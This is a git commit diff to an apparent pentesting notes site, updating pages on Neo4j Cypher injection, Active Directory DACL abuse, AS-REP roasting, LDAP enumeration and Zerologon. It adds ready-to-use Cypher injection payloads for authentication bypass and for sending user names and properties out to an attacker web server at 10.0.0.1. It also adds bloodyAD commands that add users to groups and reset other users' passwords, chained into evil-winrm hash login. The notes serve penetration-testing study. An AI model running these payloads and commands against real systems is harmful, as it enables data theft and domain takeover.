updated Neo4j pentesting

hdks-bug · hdks-bug · commit 3c72d22aa631 · 2025-04-19T20:59:33.000+09:00
diff --git a/src/exploit/database/neo4j-pentesting.md b/src/exploit/database/neo4j-pentesting.md
@@ -7,7 +7,7 @@ tags:
 refs:
     - https://book.hacktricks.xyz/pentesting-web/sql-injection/cypher-injection-neo4j
     - https://pentester.land/blog/cypher-injection-cheatsheet/
-date: 2023-04-27
+date: 2025-04-19
 draft: false
 ---
 
@@ -17,17 +17,14 @@ draft: false
 neo4j:neo4j
 ```
 
-<br />
-
 ## Common Directories & Files in Local System
 
 ```bash
+/etc/neo4j
 /var/lib/neo4j
 /var/log/neo4j
 ```
 
-<br />
-
 ## Cypher Injection
 
 Before injecting payloads, we need to start local web server to fetch the result of the query.
@@ -36,9 +33,8 @@ Before injecting payloads, we need to start local web server to fetch the result
 sudo python3 -m http.server 80
 ```
 
-Below are payloads.
-
-In some payloads, replace **`10.0.0.1`** with your ip address.
+And then below are payloads.  
+In some payloads, replace **`10.0.0.1`** with your local ip address.
 
 ```html
 <!-- Get Neo4j version -->
@@ -49,4 +45,12 @@ In some payloads, replace **`10.0.0.1`** with your ip address.
 
 <!-- Get properties of the key -->
 ' OR 1=1 WITH 1 as a MATCH (f:user) UNWIND keys(f) as p LOAD CSV FROM 'http://10.0.0.1/?' + p +'='+toString(f[p]) as l RETURN 0 as _0 //
-```
+
+<!-- Authentication Bypass -->
+' OR 1=1 WITH 1 as a MATCH (n) WHERE n.name = "admin" and n.password = 1 OR 1=1 RETURN n LIMIT 0; //
+
+<!-- Get username (assume that the label name is 'User') -->
+' OR 1=1 WITH 1 as a MATCH (u:User) LOAD CSV FROM 'http://10.0.0.1/?value=' + toString(u.name) as l RETURN 0 as _0; //
+```
+
+For more detailed cheat sheet, see [Cypher Injection Cheat Sheet](https://pentester.land/blog/cypher-injection-cheatsheet/#authentication-bypass).
diff --git a/src/exploit/network/attack/dos-ddos-attack.md b/src/exploit/network/attack/dos-ddos-attack.md
diff --git a/src/exploit/windows/active-directory/as-rep-roasting.md b/src/exploit/windows/active-directory/as-rep-roasting.md
@@ -5,7 +5,7 @@ tags:
     - Active Directory
     - Windows
 refs:
-date: 2025-03-17
+date: 2025-04-19
 draft: false
 ---
 
@@ -34,5 +34,3 @@ john --format=krb5asrep --wordlist=wordlist.txt hash.txt
 hashcat -m 18200 -a 0  hash.txt wordlist.txt
 ```
 
-Also, we can use it to **Pass-The-Hash** attack.
-
diff --git a/src/exploit/windows/active-directory/dacl-attack.md b/src/exploit/windows/active-directory/dacl-attack.md
@@ -7,7 +7,7 @@ tags:
 refs:
     - https://www.thehacker.recipes/a-d/movement/dacl
     - https://learn.microsoft.com/en-us/windows/win32/secauthz/access-control-lists
-date: 2025-03-17
+date: 2025-04-19
 draft: false
 ---
 
@@ -62,6 +62,8 @@ pip3 install -r requirements.txt
 python3 examples/dacledit.py --help
 ```
 
+Note: This repository is updated frequently so errors may occur. If so, try using the `git log` and `git checkout <prev_commit_id>` commands to revert to the previous commit and then run it.
+
 Then run the following command:
 
 ```bash
@@ -87,8 +89,10 @@ After adding rights, we can abuse it with various methods.
 ### Method 1. Add User to Group → Get TGT → Get NT Hash
 
 ```bash
-# 1. Add user to a specific group
-bloodyAD --host <target-ip> -u <username> -p <password> add groupMember <group> <username>
+# 1. Add user to a specific group (replace the group distinguished name with your target)
+bloodyAD --host <target-ip> -u <username> -p <password> add groupMember 'CN=Example Group,CN=Users,DC=EXAMPLE,DC=LOCAL' <username>
+# with Kerberos auth (-k)
+bloodyAD --host <target-ip> -u <username> -k add groupMember 'CN=Example Group,CN=Users,DC=EXAMPLE,DC=LOCAL' <username>
 
 # 2. Add the target user to a privileged group
 python3 pywhisker.py -d example.local -u <username> -p <password> --target <target-username> --action add
@@ -104,3 +108,15 @@ python3 getnthash.py example.local/<target-username> -key <key>
 # 5. Login with the retrieved NT hash
 evil-winrm -i <target-ip> -u <target-username> -H <nt-hash>
 ```
+
+### Method 2. Set Password of Another User
+
+If an user have the permission to set another user password, we can change the password:
+
+```bash
+bloodyAD --host <target-ip> -u <username> -p <password> set password '<target-username>' '<new-password>'
+# with Kerberos auth (-k)
+bloodyAD --host <target-ip> -u <username> -k set password '<target-username>' '<new-password>'
+```
+
+After that, we can try further attacks using this user.
diff --git a/src/exploit/windows/active-directory/ldap-pentesting.md b/src/exploit/windows/active-directory/ldap-pentesting.md
@@ -5,7 +5,7 @@ tags:
     - Active Directory
     - Windows
 refs:
-date: 2025-03-17
+date: 2025-04-19
 draft: false
 ---
 
@@ -20,7 +20,7 @@ nmap --script "ldap* and not brute" -p 389 <target-ip>
 
 # NetExec
 # -k: Use Kerberos authentication
-netexec ldap <target-ip> -u usernames.txt -p '' -k
+netexec ldap <target-ip> -u usernames.txt -k
 # --trusted-for-delegation: Enumerate computers and users with the flag `TRUSTED_FOR_DELEGATION`
 # reference: https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties#property-flag-descriptions
 netexec ldap <target-ip> -u username -p password --trusted-for-delegation
diff --git a/src/exploit/windows/active-directory/netlogon-elevasion.md b/src/exploit/windows/active-directory/netlogon-elevasion.md
@@ -1,11 +1,11 @@
 ---
-title: Netlogon Elavasion of Privilege
+title: Netlogon Elevasion
 description: It is a vulnerability to elevate of privilege in Windows Netlogon using the Netlogon Remote Protocol (MS-NRPC). It’s called Zerologon (CVE-2020-1472).
 tags:
     - Active Directory
     - Windows
 refs:
-date: 2023-02-08
+date: 2025-04-19
 draft: false
 ---
 
